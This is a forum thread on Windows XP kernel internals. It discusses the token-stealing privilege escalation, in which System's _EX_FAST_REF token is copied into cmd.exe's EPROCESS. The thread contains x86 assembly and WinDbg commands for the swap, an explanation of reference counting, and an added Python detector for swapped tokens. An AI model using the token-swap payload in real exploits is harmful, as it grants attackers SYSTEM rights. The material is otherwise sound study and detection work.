A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about kernel-mode development.
 #16245  by R00tKit
 Wed Oct 24, 2012 6:11 am
hi

This code is an old method to gain the system token for our process (for example cmd.exe).
I know _EX_FAST_REF is a union and the last 3 bits must be 0, so the token field points to the real token object (in x64 it's 4 bits).
Code:
mov edi, [System_EPROCESS+WINXP_TOKEN_OFFSET]     ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                               ; Must be aligned by 8
mov [CMD_EPROCESS+WINXP_TOKEN_OFFSET], edi        ; We replace the token of the cmd process
                                                  ; to escalate by the token of the process
                                                  ; with SYSTEM PID

So what is the problem if we wholly replace the _EX_FAST_REF of cmd with the _EX_FAST_REF of system?

Code:
mov   ebx, [System_EPROCESS+WINXP_TOKEN_OFFSET]
mov   [CMD_EPROCESS+WINXP_TOKEN_OFFSET], ebx   ; now cmd EPROCESS _EX_FAST_REF must point to system _EX_FAST_REF
I did it and it works perfectly without any problem (after this cmd.exe gets the system account).
I asked EP why closing cmd.exe doesn't lead the system to crash (the system must free the closed object, so the system process token must now point to an invalid object).
He said:
System will not free this token object because its RefCount will not be counted as 0 after cmd.exe exits. Look at the "System" process token. Every one of them has at least 1 reference.
Why does the system token have a big RefCount number?

What I do exactly in WinDbg:
81eef138 = system EPROCESS
_EX_FAST_REF offset in XPSP3 is 0x0c8
Code:
dpa 81eef138+0x0c8

result => e1000805

81f49620 = cmd.exe EPROCESS
Code:
ep 81f49620+0x0c8  e1000805
thanks
 #16250  by R00tKit
 Wed Oct 24, 2012 1:00 pm
Thanks to EP

1. Internally, Windows does the unmasking when accessing this object, so it makes no difference what you copy.
2. Look at objects; all of them have security descriptors. Now take the WRK and look at how system threads are created and when their primary token is referenced.
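The unmasking EP describes in point 1, modelled as an added example (not code from the original post or from Windows): the kernel reaches the real object by masking the low bits of the _EX_FAST_REF, so a raw copy resolves to the same token as the masked pointer. The same decoding gives a defender-side consistency check over a dump of per-process token values: any process whose token resolves to the System process's token object has had its token swapped. Assumed here: 3 tag bits on 32-bit Windows, 4 on x64, the cached reference count in those bits; the sample table is constructed from the value in the post.

```python
# Added example, not from the original post. Assumption: low 3 (x86) / 4 (x64)
# bits of _EX_FAST_REF hold a cached reference count, the rest the object pointer.
FAST_REF_TAG_BITS = {32: 3, 64: 4}

def split_fast_ref(value, bits=32):
    """Return (object pointer, cached reference count) for an _EX_FAST_REF value.

    This is the unmasking the kernel performs whenever it dereferences the union:
    the low bits are cleared to reach the real object, so a raw value copied from
    another EPROCESS resolves to exactly the same object as the masked pointer.
    """
    tag = FAST_REF_TAG_BITS[bits]
    mask = (1 << tag) - 1
    return value & ~mask, value & mask

def join_fast_ref(obj, cached, bits=32):
    """Inverse of split_fast_ref; rejects misaligned pointers and oversized counts."""
    tag = FAST_REF_TAG_BITS[bits]
    mask = (1 << tag) - 1
    if obj & mask:
        raise ValueError("object pointer must be aligned to %d" % (mask + 1))
    if not 0 <= cached <= mask:
        raise ValueError("cached count must fit in %d bits" % tag)
    return obj | cached

def processes_sharing_token(token_refs, system_pid=4, bits=32):
    """token_refs maps pid -> raw EPROCESS.Token (_EX_FAST_REF) value.

    Returns pids (other than the System process) whose token resolves to the
    same object as System's. Distinct processes normally own distinct token
    objects, so a match is the trace a token swap leaves behind. Comparing the
    masked pointers, not the raw values, keeps the check independent of the
    cached-count bits, which change as references are taken and released.
    """
    system_obj, _ = split_fast_ref(token_refs[system_pid], bits)
    return sorted(pid for pid, raw in token_refs.items()
                  if pid != system_pid and split_fast_ref(raw, bits)[0] == system_obj)

# Constructed sample: the System value from the post (e1000805), a cmd.exe whose
# raw value was copied, and an unrelated process with its own token object.
SAMPLE_TOKENS = {
    4:    0xE1000805,   # System: object 0xE1000800, 5 cached references
    1234: 0xE1000805,   # cmd.exe after the raw copy
    2468: 0xE1A3C2B3,   # unrelated process, its own token (constructed value)
}

if __name__ == "__main__":
    print(hex(split_fast_ref(SAMPLE_TOKENS[4])[0]), processes_sharing_token(SAMPLE_TOKENS))
```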